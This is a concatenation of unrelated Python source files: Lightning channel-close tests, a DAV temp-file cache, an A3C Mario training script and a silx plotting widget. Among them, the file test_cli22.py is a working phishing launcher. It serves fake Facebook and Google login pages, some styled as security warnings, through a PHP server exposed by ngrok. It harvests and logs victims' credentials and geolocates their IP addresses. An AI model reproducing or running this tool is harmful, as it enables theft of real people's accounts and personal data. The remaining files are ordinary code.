    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
    """Basic dev_fail unilateral close: both sides track the close onchain,
    billboard statuses are correct, and l1 ends up with the spendable output.
    """
    l1, l2 = node_factory.line_graph(2)

    # The funding change should be confirmed and our only output
    assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
    l1.pay(l2, 200000000)

    # Make sure l2 has received sig with 0 htlcs!
    l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
    l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')

    # Make sure l1 has final revocation.
    l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
    l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # We fail l2, so l1 will reconnect to it.
    l2.rpc.dev_fail(l1.info['id'])
    l2.daemon.wait_for_log('Failing due to dev-fail command')
    l2.wait_for_channel_onchain(l1.info['id'])

    # Only the unilateral close tx should be in the mempool.
    assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1

    # Now grab the close transaction
    closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))

    # l2 will send out tx (l1 considers it a transient error)
    bitcoind.generate_block(1)

    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')

    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
             == ['ONCHAIN:Tracking their unilateral close',
                 'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])

    def check_billboard():
        # l2's billboard: tracking its own close, one unresolved to-self output.
        billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
        return (
            len(billboard) == 2
            and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
            and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
        )
    wait_for(check_billboard)

    # Now, mine 4 blocks so it sends out the spending tx.
    bitcoind.generate_block(4)

    # onchaind notes to-local payment immediately.
    assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])

    # Restart, should still be confirmed (fails: unwinding blocks erases
    # the confirmation, and we don't re-make it).
    l1.restart()
    wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))

    # It should send the to-wallet tx.
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # 100 after l1 sees tx, it should be done.
    bitcoind.generate_block(95)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])

    wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
        'ONCHAIN:Tracking our own unilateral close',
        'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
    ])

    # Now, 100 blocks l2 should be done.
    bitcoind.generate_block(5)
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])

    # Only l1 has a direct output since all of l2's outputs are respent (it
    # failed). Also the output should now be listed as confirmed since we
    # generated some more blocks.
    assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])

    addr = l1.bitcoin.rpc.getnewaddress()
    l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
    """Stop a node cleanly, checking for memory leaks first (outside valgrind,
    where dev_memleak is the leak detector of choice)."""
    # Fail, in that it will exit before cleanup.
    l1 = node_factory.get_node(may_fail=True)
    if not VALGRIND:
        leaks = l1.rpc.dev_memleak()['leaks']
        if len(leaks):
            raise Exception("Node {} has memory leaks: {}"
                            .format(l1.daemon.lightning_dir, leaks))
    l1.rpc.stop()
|
test_cli22.py | import json
import multiprocessing
import os
from os import system, path
import re
from urllib.request import urlopen
from sys import stdout, argv, exit
from PyQt5 import QtCore
import time,subprocess as sp
from datetime import datetime
import ctypes
class Phishing_cli():
def __init__(self):
if "nt" in os.name:
self.dirk: str = str(sp.getoutput('powershell pwd'))
self.dirk: str = self.dirk.replace(" ", "").replace("\r", "").replace("\n", "").replace("'", "").replace("Path", "").replace("--", "")
if ("\\Phishing" not in self.dirk):
self.dirk += "\\Phishing"
else:
self.dirk: str = str(sp.getoutput('pwd'))
if ("/Phishing" not in self.dirk):
self.dirk += "/Phishing"
def check_need(self):
try:
if 256 != system('which php > /dev/null'):
print("PHP INSTALLATION FOUND")
else:
print("{ PHP NOT FOUND: \n Please install PHP and run me again.http://www.php.net/")
exit()
except:
if 256 != system('where php'):
print("PHP INSTALLATION FOUND")
else:
print("{ PHP NOT FOUND: \n Please install PHP and run me again.http://www.php.net/")
exit()
try:
is_admin = os.getuid() == 0
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if (is_admin):
print("good")
else:
print("run with root,Administrator permission")
exit()
def runPhishing(self,page, customOption,dirk):
if "nt" in os.name:
system('powershell rm -Force ' + dirk + '\\Server\\www\\*.* && powershell rm -Force ' + dirk + '\\Server\\www\\* && copy '
+ dirk + '\\WebPages\\ip.php ' + dirk + '\\Server\\www\\ && copy '
+ dirk + '\\Server\\CapturedData\\login.php ' + dirk + '\\Server\\www\\ && echo 1> ' + dirk + '\\Server\\www\\usernames.txt && echo 1 > ' + dirk + '\\Server\\www\\ip.txt')
print("jjj",dirk)
if customOption == '1' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_standard\\* " + dirk + "\\Server\\www\\")
elif customOption == '2' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_advanced_poll\\* " + dirk + "\\Server\\www\\")
elif customOption == '3' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_security_fake\\* " + dirk + "\\Server\\www\\")
elif customOption == '4' and page == 'Facebook':
system("powershell copy -r " + dirk + "\\WebPages\\fb_messenger\\* " + dirk + "\\Server\\www\\")
elif customOption == '1' and page == 'Google':
system("powershell copy -r " + dirk + "\\WebPages\\google_standard\\* " + dirk + "\\Server\\www\\")
elif customOption == '2' and page == 'Google':
system("powershell copy -r " + dirk + "\\WebPages\\google_advanced_poll\\* " + dirk + "\\Server\\www\\")
elif customOption == '3' and page == 'Google':
system("powershell copy -r " + dirk + "\\WebPages\\google_advanced_web\\* " + dirk + "\\Server\\www\\")
else:
system(
'rm -Rf ' + dirk + '/Server/www/*.* && cp ' + dirk + '/WebPages/ip.php ' + dirk + '/Server/www/ && cp ' + dirk + '/Server/CapturedData/login.php ' + dirk + '/Server/www/ && echo > ' + dirk + '/Server/www/usernames.txt && echo > ' + dirk + '/Server/www/ip.txt')
print("jjj", dirk)
if customOption == '1' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_standard/* " + dirk + "/Server/www/")
elif customOption == '2' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_advanced_poll/* " + dirk + "/Server/www/")
elif customOption == '3' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_security_fake/* " + dirk + "/Server/www/")
elif customOption == '4' and page == 'Facebook':
system("cp -r " + dirk + "/WebPages/fb_messenger/* " + dirk + "/Server/www/")
elif customOption == '1' and page == 'Google':
system("cp -r " + dirk + "/WebPages/google_standard/* " + dirk + "/Server/www/")
elif customOption == '2' and page == 'Google':
system("cp -r " + dirk + "/WebPages/google_advanced_poll/* " + dirk + "/Server/www/")
elif customOption == '3' and page == 'Google':
system("cp -r " + dirk + "/WebPages/google_advanced_web/* " + dirk + "/Server/www/")
def mainMenu(self):
if "nt" in os.name:
system('cls')
pass
else:
system('clear')
print("------------------------SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:------------------------")
print("""-1 Facebook\n-2Google""")
option = input("SCPT >>> ")
if option == '1':
customOption = input(
"\nOperation mode:\nStandard Page Phishing\n1 Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n2 Facebook Phishing- Fake Security issue(security_mode) \n3 Facebook Phising-Messenger Credentials(messenger_mode) \nSCPT >>> ")
self.runPhishing('Facebook', customOption,self.dirk)
elif option == '2':
customOption = input(
"\nOperation mode:\n Standard Page Phishing\n1 Advanced Phishing(poll_mode/login_with)\n2 New Google Web\nscpt >>> ")
self.runPhishing('Google', customOption,self.dirk)
def inputCustom(self,custom,dirk):
if 'http://' in custom or 'https://' in custom:
pass
else:
custom = 'http://' + custom
if "nt" in os.name:
with open(dirk + '\\Server\\www\\login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open(dirk + '\\Server\\www\\login.php', 'w')
f.write(c)
f.close()
else:
with open(dirk + '/Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open(dirk + '/Server/www/login.php', 'w')
f.write(c)
f.close()
def runServer(self,port):
if "nt" in os.name:
system("powershell Stop-Process -Id (Get-NetTCPConnection -LocalPort %s).OwningProcess -Force " % (port))
system("cd " + self.dirk + "\\Server\\www\\ && powershell Start-Process -NoNewWindow powershell 'php -S 127.0.0.1:%s' " % (port))
else:
system("fuser -k %s/tcp > /dev/null 2>&1" % (port))
system("cd " + self.dirk + "/Server/www/ && php -S 127.0.0.1:%s > /dev/null 2>&1 &" % (port))
def runNgrok(self,port,dirk):
if "nt" in os.name:
system("powershell Start-Process -NoNewWindow powershell '"+dirk + "\\.\\Server\\ngrok http {} ' ".format(port))
time.sleep(3)
# system("powershell Invoke-WebRequest -Uri http://localhost:4040/api/tunnels -UseBasicParsing > " + dirk + "\\tunnels.json")
system("curl http://localhost:4040/api/tunnels > " + dirk + "\\tunnels.json")
with open(dirk + '\\tunnels.json') as data_file:
datajson = json.load(data_file)
msg = "ngrok URL's: \n"
for i in datajson['tunnels']:
msg = msg + i['public_url'] + '\n'
return msg
else:
system("chmod +x "+dirk + '/./Server/ngrok ')
system(dirk + '/./Server/ngrok http {} > /dev/null &'.format(port))
time.sleep(3)
# """ curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"https:..([^"]*).*/\1/p' """
system("curl http://localhost:4040/api/tunnels > " + dirk + "/tunnels.json")
with open(dirk + '/tunnels.json') as data_file:
datajson = json.load(data_file)
msg = "ngrok URL's: \n"
for i in datajson['tunnels']:
msg = msg + i['public_url'] + '\n'
return msg
def getCredentials(self):
print(
" Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim ... \n"
"________________________________________________________________________________\n")
crides_nm = ""
crides_nm2 = ""
try:
date = str(datetime.today().strftime('%Y-%m-%d'))
if "nt" in os.name:
dirk2 = self.dirk.replace('\\Phishing', '\\Reports\\phishing\\')
diroping = self.dirk + '\\Server\\www\\usernames.txt'
diroping_ip = self.dirk + '\\Server\\www\\ip.txt'
else:
dirk2 = self.dirk.replace('/Phishing', '/Reports/phishing/')
diroping = self.dirk + '/Server/www/usernames.txt'
diroping_ip = self.dirk + '/Server/www/ip.txt'
while True:
with open(diroping) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
if lines not in crides_nm2:
crides_nm2 += lines
print(lines)
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(lines)
dop.write("\n")
dop.close()
else:
pass
with open(diroping_ip) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.search("Victim Public IP: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\n,\r]", lines).group(1)
resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))
ipinfo = json.loads(resp.read().decode(
resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
print(' \n\n[ VICTIM IP BONUS ]\n {0}{2}{1}'.format(
lines))
if str(lines) not in crides_nm:
crides_nm += str(lines)
print(lines)
else:
pass
else:
pass
if str(ipinfo) not in crides_nm:
crides_nm += str(ipinfo)
print(ipinfo)
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(str(ipinfo))
dop.write("\n")
dop.close()
else:
pass
creds.close()
except:
pass
class GUI(QtCore.QThread):
Gui_Date_output = QtCore.pyqtSignal(object)
def __init__(self, port, customOption, pages_type,redk) -> None:
QtCore.QThread.__init__(self)
self.PHish = Phishing_cli()
self.port = port
self.customOption = customOption
self.pages_type = pages_type
self.redk = redk
if "nt" in os.name:
self.dirk: str = str(sp.getoutput('powershell pwd'))
self.dirk = self.dirk.replace(" ", "").replace("\r", "").replace("\n", "").replace("'", "").replace("Path", "").replace( "--", "")
if ("\\Phishing" not in self.dirk):
self.dirk += "\\Phishing"
else:
self.dirk: str = str(sp.getoutput('pwd'))
if ("/Phishing" not in self.dirk):
self.dirk += "/Phishing"
def getCredentials(self):
print(
" Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim ... \n"
"________________________________________________________________________________\n")
crides_nm = ""
crides_nm2 = ""
try:
date = str(datetime.today().strftime('%Y-%m-%d'))
if "nt" in os.name:
dirk2 = self.dirk.replace('\\Phishing', '\\Reports\\phishing\\')
dropingk = self.dirk + '\\Server\\www\\usernames.txt'
dropingips = self.dirk + '\\Server\\www\\ip.txt'
else:
dirk2 = self.dirk.replace('/Phishing', '/Reports/phishing/')
dropingk = self.dirk + '/Server/www/usernames.txt'
dropingips = self.dirk + '/Server/www/ip.txt'
while True:
with open(dropingk) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
if lines not in crides_nm2:
crides_nm2 += lines
print(lines)
self.Gui_Date_output.emit(str(lines))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(lines)
dop.write("\n")
dop.close()
else:
pass
with open(dropingips) as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.search("Victim Public IP: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\n,\r]",
lines).group(1)
resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))
ipinfo = json.loads(resp.read().decode(
resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
print(' \n\n[ VICTIM IP BONUS ]\n {0}{2}{1}'.format(
lines))
if str(lines) not in crides_nm:
crides_nm += str(lines)
print(lines)
self.Gui_Date_output.emit(str(lines))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
else:
pass
else:
pass
if str(ipinfo) not in crides_nm:
crides_nm += str(ipinfo)
print(ipinfo)
self.Gui_Date_output.emit(str(ipinfo))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
with open(dirk2 + date + "_phishing.json", "a") as dop:
dop.write(str(ipinfo))
dop.write("\n")
dop.close()
else:
pass
creds.close()
except:
pass
def run(self) -> None:
self.PHish.check_need()
self.PHish.runPhishing(self.pages_type, self.customOption,self.dirk)
self.PHish.inputCustom(self.redk,self.dirk)
self.PHish.runServer(self.port)
url = self.PHish.runNgrok(self.port,self.dirk)
print(url)
self.Gui_Date_output.emit(str(url))
time.sleep(1)
QtCore.QCoreApplication.processEvents()
multiprocessing.Process(target=self.PHish.runServer, args=(self.port,)).start()
self.getCredentials()
if __name__ == '__main__':
try:
PHish = Phishing_cli()
PHish.check_need()
PHish.mainMenu()
if "nt" in os.name:
system('cls')
pass
else:
system('clear')
print('''\nChoose Wisely As Your Victim Will Redirect to This Link''')
print(
'''\nDo not leave it blank. Unless Errors may occur''')
print(
'''\nInsert a custom redirect url:''')
custom = str(input('''\nREDIRECT HERE>>> '''))
PHish.inputCustom(custom,PHish.dirk)
port = 56
PHish.runServer(port)
url = PHish.runNgrok(port,PHish.dirk)
print(url)
multiprocessing.Process(target=PHish.runServer, args=(port,)).start()
if "nt" in os.name:
while True:
PHish.getCredentials()
else:
PHish.getCredentials()
except KeyboardInterrupt:
if "nt" in os.name:
system('taskkill /IM "ngrok.exe" /F')
else:
system('sudo pkill ngrok')
exit()
|
ISSMDAVFileHandler.py | from datetime import *
import tempfile
import time
import threading
import os
class ISSMDAVFileHandler():
    """Registry of per-(path, user) temporary files for DAV file handling.

    Entries live in ``self.tempfile_list`` keyed by a hash of path+user id;
    a background watcher thread expires entries that have been processed
    (carry 'infos') or have been idle for more than one minute.
    """

    # Base directory for materialized temp files (was duplicated inline).
    TEMP_DIR = '/data/temp/'

    def __init__(self):
        # search_hash -> {'temp_file', 'last_change_date', 'name', optional 'infos'}
        self.tempfile_list = {}
        print("----------------------------------------------------")
        # NOTE(review): non-daemon thread with an infinite loop — it keeps
        # the process alive on shutdown; confirm whether daemon=True is wanted.
        t1 = threading.Thread(target=self.init_cache_watcher, args=())
        t1.start()
        print("----------------------------------------------------")

    def init_cache_watcher(self):
        """Poll the cache forever, every 10 seconds."""
        while True:
            self.checkCache()
            time.sleep(10)

    def checkCache(self):
        """Expire entries that were processed or idle for over a minute."""
        print(f"checkCache -- {len(self.tempfile_list.keys())}")
        one_minute_ago = datetime.now() - timedelta(minutes=1)
        # Iterate over a copy: clearCacheItem mutates tempfile_list.
        for search_hash, item in self.tempfile_list.copy().items():
            print(f"search_hash: {search_hash}")
            # check if item expire (after 60s)
            if self.processCacheItem(item) or item['last_change_date'] < one_minute_ago:
                self.clearCacheItem(search_hash)

    def processCacheItem(self, cache_item):
        """Return True when the item carries 'infos' (i.e. it is done and
        may be discarded), logging the infos as a side effect."""
        if 'infos' in cache_item:
            print(cache_item['infos'])
            return True
        return False

    def clearCacheItem(self, search_hash):
        """Remove the on-disk temp file (if any) and drop the cache entry."""
        temp_file = self.TEMP_DIR + search_hash
        # Bug fix: an unguarded os.unlink raised FileNotFoundError when the
        # file was never materialized, killing the watcher thread's loop.
        try:
            os.unlink(temp_file)
        except FileNotFoundError:
            pass
        if search_hash in self.tempfile_list:
            del self.tempfile_list[search_hash]

    def calHash(self, path, user):
        """Cache key for (path, user).

        NOTE(review): built-in hash() is salted per process
        (PYTHONHASHSEED), so keys — and temp file names — are not stable
        across restarts; confirm that is acceptable.
        """
        return "h_" + str(hash(path + str(user['id'])))

    def getTempFileItem(self, path, user):
        """Return the cache entry dict for (path, user), or None."""
        search_hash = self.calHash(path, user)
        print(F"getTempFileItem: {search_hash} -- {len(self.tempfile_list.keys())}")
        return self.tempfile_list.get(search_hash)

    def getTempFile(self, path, user):
        """Return the stored temp-file value, or None if no entry exists."""
        item = self.getTempFileItem(path, user)
        return item["temp_file"] if item is not None else None

    def getTempFileName(self, path, user):
        """Return the stored display name, or None if no entry exists."""
        item = self.getTempFileItem(path, user)
        return item["name"] if item is not None else None

    def setTempFile(self, path, user, temp_file, name):
        """Insert or replace the entry for (path, user); returns temp_file.

        The original if/else had two byte-identical branches — insert and
        replace are the same dict assignment, so it is collapsed here.
        """
        search_hash = self.calHash(path, user)
        print(F"setTempFile: {search_hash}")
        self.tempfile_list[search_hash] = {
            'temp_file': temp_file,
            'last_change_date': datetime.now(),
            'name': name,
        }
        return temp_file

    def newTempFile(self, path, user, name):
        """Register a fresh temp-file path under TEMP_DIR and return it.

        Only the parent directory is created; the file itself is not
        materialized here.
        """
        search_hash = self.calHash(path, user)
        temp_file = self.TEMP_DIR + search_hash
        os.makedirs(os.path.dirname(temp_file), exist_ok=True)
        return self.setTempFile(path, user, temp_file, name)

    def removeTempFile(self, path, user, name):
        """Drop the entry for (path, user); ``name`` is unused but kept
        for backward compatibility with existing callers."""
        search_hash = self.calHash(path, user)
        return self.clearCacheItem(search_hash)

    def addInformationToTempFile(self, path, user, information):
        """Attach 'infos' to the entry, marking it for cleanup.

        NOTE(review): raises TypeError when no entry exists for
        (path, user) — presumably callers invoke this only after
        newTempFile; confirm.
        """
        temp_file_item = self.getTempFileItem(path, user)
        temp_file_item['infos'] = information
        return temp_file_item
|
train.py | # Create by Packetsss
# Personal use is allowed
# Commercial use is prohibited
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import os
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import torch
from src.env import create_train_env
from src.model import ActorCritic
from src.optimizer import GlobalAdam
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil
def _str2bool(value):
    """Parse a command-line boolean: accepts true/false, yes/no, 1/0."""
    if isinstance(value, bool):
        return value
    lowered = str(value).strip().lower()
    if lowered in ("true", "t", "yes", "y", "1"):
        return True
    if lowered in ("false", "f", "no", "n", "0", ""):
        return False
    raise argparse.ArgumentTypeError("expected a boolean, got %r" % (value,))


def get_args():
    """Build and parse the command-line options for A3C Super Mario training.

    Returns the parsed argparse Namespace (reads sys.argv).
    """
    parser = argparse.ArgumentParser(
        """Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
    parser.add_argument("--world", type=int, default=1)
    parser.add_argument("--stage", type=int, default=1)
    parser.add_argument("--action_type", type=str, default="complex")
    parser.add_argument('--lr', type=float, default=1e-4)
    parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
    parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
    parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
    parser.add_argument("--num_local_steps", type=int, default=50)
    # Bug fix: the option declared type=int but defaulted to the float 5e6;
    # the default is now a genuine int so downstream integer math is safe.
    parser.add_argument("--num_global_steps", type=int, default=int(5e6))
    parser.add_argument("--num_processes", type=int, default=6)
    parser.add_argument("--save_interval", type=int, default=500, help="Number of steps between savings")
    parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
    parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
    parser.add_argument("--saved_path", type=str, default="trained_models")
    # Bug fix: type=bool is broken in argparse — bool("False") is True, so
    # every non-empty value parsed as True.  _str2bool parses the text.
    parser.add_argument("--load_from_previous_stage", type=_str2bool, default=False,
                        help="Load weight from previous trained stage")
    parser.add_argument("--use_gpu", type=_str2bool, default=True)
    args = parser.parse_args()
    return args
def train(opt):
    """Launch A3C training: one shared global model updated by several worker processes.

    :param opt: argparse.Namespace produced by :func:`get_args`.
    """
    torch.manual_seed(123)  # fixed seed for reproducibility
    # Start from a clean TensorBoard log directory.
    if os.path.isdir(opt.log_path):
        shutil.rmtree(opt.log_path)
    os.makedirs(opt.log_path)
    if not os.path.isdir(opt.saved_path):
        os.makedirs(opt.saved_path)
    # "spawn" avoids inheriting CUDA/interpreter state in forked children.
    mp = _mp.get_context("spawn")
    env, num_states, num_actions = create_train_env(opt.world, opt.stage, opt.action_type)
    global_model = ActorCritic(num_states, num_actions)
    if opt.use_gpu:
        global_model.cuda()
    global_model.share_memory()  # workers update these parameters in place
    if opt.load_from_previous_stage:
        # Warm-start from the previous stage (stage 4 of the previous world
        # when starting a world's first stage).
        if opt.stage == 1:
            previous_world = opt.world - 1
            previous_stage = 4
        else:
            previous_world = opt.world
            previous_stage = opt.stage - 1
        file_ = "{}/a3c_super_mario_bros_{}_{}".format(opt.saved_path, previous_world, previous_stage)
        if os.path.isfile(file_):
            global_model.load_state_dict(torch.load(file_))
    optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
    processes = []
    for index in range(opt.num_processes):
        if index == 0:
            # Worker 0 gets an extra True flag — presumably enables saving/
            # logging inside local_train; confirm against src/process.py.
            process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
        else:
            process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
        process.start()
        processes.append(process)
    # One extra process runs the evaluation loop against the global model.
    process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
    process.start()
    processes.append(process)
    for process in processes:
        process.join()
if __name__ == "__main__":
    # Entry point: parse CLI options and start training.
    opt = get_args()
    train(opt)
|
CurvesView.py | # coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2017 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""
Widget displaying the synthesis of many curves taken with the same X values
"""
from __future__ import division
__authors__ = ["T. VINCENT"]
__license__ = "MIT"
__date__ = "30/05/2017"
import logging
import numpy
from silx.gui import qt
from silx.gui.plot import Plot1D
_logger = logging.getLogger(__name__)
if hasattr(numpy, "nanmean"):
    nanmean = numpy.nanmean
else:  # Debian 7 support
    def nanmean(data, axis=None):
        """Mean of the non-NaN elements of *data*.

        :param numpy.ndarray data: The array to process
        :param axis: None or the axis index along which to compute the means.
        """
        valid = ~numpy.isnan(data)
        return numpy.nansum(data, axis) / numpy.sum(valid, axis, dtype="int")
# TODO make the min/max background work for negative values...
# TODO split control widgets from curves plot
# TODO make curves handling not being a widget and make it interact with a plot
# TODO optimisation of min/mean/max computation
# TODO optimisation of plotting: no update curves when not in live mode
# TODO optimisation of plotting: no update of background when not 'visible' change
# TODO add std? in background
# TODO error bars of current curves
# TODO set number of curves displayed
# TODO matplotlib bad rendering of filled curves regarding edges
# TODO OO API with setters
class CurvesView(qt.QWidget):
    """Widget displaying statistical indicators over many curves

    :param parent: Parent QWidget or None
    :param f: Qt window flags
    """

    # Signals used to marshal calls from worker threads to the main/GUI thread.
    _sigAppendCurves = qt.Signal(object)
    _sigSetXData = qt.Signal(object)

    def __init__(self, parent=None, f=qt.Qt.WindowFlags()):
        super(CurvesView, self).__init__(parent, f)
        self._nbExtraCurves = 1  # neighbour curves shown on each side of the current one
        self._currentCurveColor = 0.0, 0.8, 0.0, 1.0  # RGBA of the current curve
        self._index = -1  # current curve index (Python-style, may be negative)
        self._x = None  # shared X coordinates (1D numpy array) or None
        self._data = None  # 2D array of curves (one row per curve) or None
        self._min = None
        self._max = None
        self._sum = None
        self._count = None
        self._plot = Plot1D()  # backend='matplotlib')
        self._plot.setActiveCurveHandling(False)
        # Layout: plot on top, slider + spinbox controls below.
        layout = qt.QGridLayout(self)
        layout.setContentsMargins(0, 0, 0, 0)
        layout.setSpacing(0)
        layout.addWidget(self._plot, 0, 0, 1, 2)
        self._slider = qt.QSlider(qt.Qt.Horizontal)
        layout.addWidget(self._slider, 1, 0)
        self._spinBox = qt.QSpinBox()
        layout.addWidget(self._spinBox, 1, 1)
        self._slider.valueChanged.connect(self._indexChanged)
        self._spinBox.valueChanged.connect(self._indexChanged)
        self._updateControlWidgets()
        # Queued signal connections route cross-thread calls to the GUI thread.
        self._sigAppendCurves.connect(self._appendCurves)
        self._sigSetXData.connect(self._setXData)

    def getPlot(self):
        """Returns the used :class:`PlotWidget` plot."""
        return self._plot

    def setXData(self, x):
        """Set the X coordinates of the curves.

        This method can be called from any thread.

        :param numpy.ndarray x: The X coordinates of the curves.
        """
        x = numpy.array(x, copy=True)
        assert x.ndim == 1
        self._sigSetXData.emit(x)

    def _setXData(self, x):
        """Implements :meth:`setXData` in the main thread."""
        if self._data is not None:
            # New X must match the length of already-stored curves.
            assert len(x) == self._data.shape[-1]
        self._x = x

    def getXData(self):
        """Returns the X coordinates of the curves (numpy.ndarray)"""
        return numpy.array(self._x, copy=True)

    def clear(self):
        """Reset the plot by removing all curves"""
        self._data = None
        self._min = None
        self._max = None
        self._sum = None
        self._count = None
        self.getPlot().clear()
        self.setCurrentCurveIndex(-1)
        self._updateControlWidgets()

    def _updateCurrentCurve(self):
        """Update the current curve in the plot"""
        plot = self.getPlot()
        data = self.getData(copy=False)
        currentIndex = self.getCurrentCurveIndex(absolute=True)
        # Draw/remove the neighbour curves around the current one.
        for offset in range(-self._nbExtraCurves, self._nbExtraCurves + 1):
            index = currentIndex + offset
            if offset == 0:
                continue  # the current curve itself is handled below
            legend = "N%+d" % offset
            plot.remove(legend=legend, kind="curve")
            if 0 <= index < len(data):
                # Fade line style with distance from the current curve.
                distance = abs(offset) / (self._nbExtraCurves + 1)
                if abs(offset) == 1:  # first curve
                    linestyle = "-"
                elif distance < 0.66:
                    linestyle = "--"
                else:
                    linestyle = ":"
                if offset < 0:
                    # Previous curves: darkened version of the current color.
                    color = numpy.array(self._currentCurveColor) * 0.5
                else:
                    color = "#FF9900"
                plot.addCurve(
                    self.getXData(),
                    data[index],
                    legend=legend,
                    color=color,
                    linestyle=linestyle,
                    z=100,
                    resetzoom=False,
                )
        # Current curve
        if currentIndex < len(data):
            currentCurve = data[currentIndex]
            plot.addCurve(
                self.getXData(),
                currentCurve,
                legend="current",
                color=self._currentCurveColor,
                z=101,
                linewidth=2,
                resetzoom=False,
            )
        else:
            plot.remove(legend="current", kind="curve")

    def _indexChanged(self, index):
        """Handle spinBox or slider value changed"""
